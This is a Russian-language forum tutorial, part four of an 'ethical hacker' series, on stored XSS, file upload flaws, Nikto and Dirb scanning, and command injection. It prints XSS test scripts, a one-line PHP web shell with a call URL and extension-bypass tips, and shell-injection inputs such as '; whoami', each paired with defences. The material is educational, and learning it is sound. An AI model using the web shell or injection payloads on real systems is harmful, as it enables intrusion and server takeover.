Путь этичного хакера – Часть [4] – Продвинутые атаки и анализ окружения

HMCoba

Форумчанин
Регистрация
14.06.2025
Сообщения
20
Реакции
26
st.png



🧠 Путь этичного хакера часть - 4
Продвинутые атаки и анализ окружения



📌 Оглавление серии:

Часть 1 — Введение в этичный хакинг и основы пентеста
Часть 2 — Установка Kali Linux и создание тестовой среды
Часть 3 — Тестирование уязвимостей веб-приложений
Часть 4 — Продвинутые атаки и анализ окружения
Часть 5 — Удалённый доступ и обратные подключения
Часть 6 — Повышение привилегий, поиск SUID и cron-уязвимостей
Часть 7 — Автоматизация атак с помощью Python и работа с Metasploit




Добро пожаловать в четвёртую часть серии.

Если вы читаете эту часть — значит, вы уже установил Kali Linux, создали тестовую среду и начал изучать основы пентеста.
Пришло время копнуть глубже и познакомиться с атаками, которые чаще всего встречаются в реальных веб-приложениях.




📌 В этом посте вы научитесь:
  • Что такое Stored XSS и как её эксплуатировать.
  • Как работают атаки через небезопасную загрузку файлов.
  • Использовать инструменты Nikto и Dirb для разведки директорий.
  • Проводить Command Injection — внедрение системных команд.




🧨 Stored XSS (постоянная XSS)

Stored XSS — это уязвимость, при которой вредоносный JavaScript-код сохраняется на сервере (например, в комментариях), а затем отображается другим пользователям.

Пример:
Код:
<script>alert("Ты был взломан!");</script>

Как протестировать:
  1. Найдите поле для комментариев или профиля.
  2. Вставьте JavaScript:


    Код:
    <script>alert('XSS');</script>


  3. Сохраните и проверьте — выполнится ли скрипт при открытии страницы.

Защита:
– Экранировать HTML
– CSP
– Фильтрация ввода/вывода




🗂 File Upload Vulnerabilities

Загрузка вредоносного файла (например, PHP шелл), если сервер неправильно проверяет файлы.

Пример payload:
PHP:
<?php system($_GET["cmd"]); ?>

URL вызова:
Код:
http://victim.site/uploads/shell.php?cmd=whoami

Советы:
– Меняйте расширения: .php, .phtml, .php.jpg
– Проверяйте поведение сервера после загрузки

Защита:
– MIME и расширение
– Хранение вне webroot
– Запрет на выполнение




🔎 Инструменты разведки: Nikto и Dirb

Nikto
— сканер уязвимостей веб-серверов:

Эта утилита анализирует веб-сервер на наличие:
– устаревших версий ПО,
– известных уязвимостей,
– потенциально опасных скриптов и директорий,
– ошибок конфигурации (например, доступ к /.git, phpinfo(), индексам и т.п.).

Пример запуска:
Код:
nikto -h http://target.site

🔍 Параметр -h указывает целевой сайт.


Интерпретация вывода:
Nikto выдаёт список найденных потенциальных проблем.

Например:
Код:
+ OSVDB-3092: /test/: Directory indexing found.
+ Server leaks inodes via ETags, header found with file /favicon.ico.
— это значит, что индексирование открыто (Directory indexing) и заголовки могут раскрывать информацию о сервере.

---

Dirb — инструмент для перебора директорий:
Dirb автоматически подставляет слова из словаря к базовому URL и проверяет, существуют ли такие пути на сервере. Это помогает находить:
– скрытые админ-панели,
– резервные копии (backup.zip),
– интерфейсы CMS,
– забытые страницы (/test/, /old/ и т.п.).


Базовый запуск:
Код:
dirb http://target.site


С указанием словаря:
Код:
dirb http://target.site /usr/share/wordlists/dirb/common.txt


Интерпретация вывода:
Dirb отображает найденные пути, например:

Код:
---- Scanning URL: http://target.site/ ----
+ http://target.site/admin/ (CODE:200|SIZE:1546)
+ http://target.site/login.php (CODE:200|SIZE:1320)

— это значит, что директория /admin/ и файл login.php существуют и доступны (код ответа 200).





🧬 Command Injection (инъекция команд)

Command Injection — это уязвимость, при которой можно внедрить системные команды в поля ввода.

Пример поля: «Введите IP» — выполняется:
Код:
ping -c 4 127.0.0.1




Теперь попробуйте такие вводы:


ВводЧто выполнит сервер
127.0.0.1ping -c 4 127.0.0.1
127.0.0.1; whoamiping -c 4 127.0.0.1; whoami
127.0.0.1 && lsping -c 4 127.0.0.1 && ls
127.0.0.1 | idping -c 4 127.0.0.1 | id



Пояснение:
  • ; — разделяет команды
  • && — вторая команда после успешной первой
  • | — передаёт вывод первой команде




Пошаговая проверка:
  1. Найдите поле «IP».
  2. Введите обычный IP: 127.0.0.1
  3. Убедитесь, что ping срабатывает.
  4. Введите: 127.0.0.1; whoami
  5. Если в ответе — имя пользователя или список файлов — уязвимость найдена.

Защита:
– Не использовать shell-функции без нужды
– Экранировать ввод
– Белые списки значений
– API без shell





📚 Заключение

Поздравляю — теперь вы знакомы с более продвинутыми техниками тестирования: XSS, загрузка файлов, сканирование директорий и Command Injection.
В следующих частях будет ещё мощнее — подключение к скомпрометированной системе, повышение привилегий и многое другое.
Напишите в комментариях, о чём вы хотели бы узнать в пятой части.


🔗 Полезные ссылки:


Если статья оказалась полезной — не забудьте поделиться ею с другими!
 

Вложения

  • st.png
    st.png
    187,5 КБ · Просмотры: 1
Последнее редактирование:

Похожие темы

Назад
Верх Низ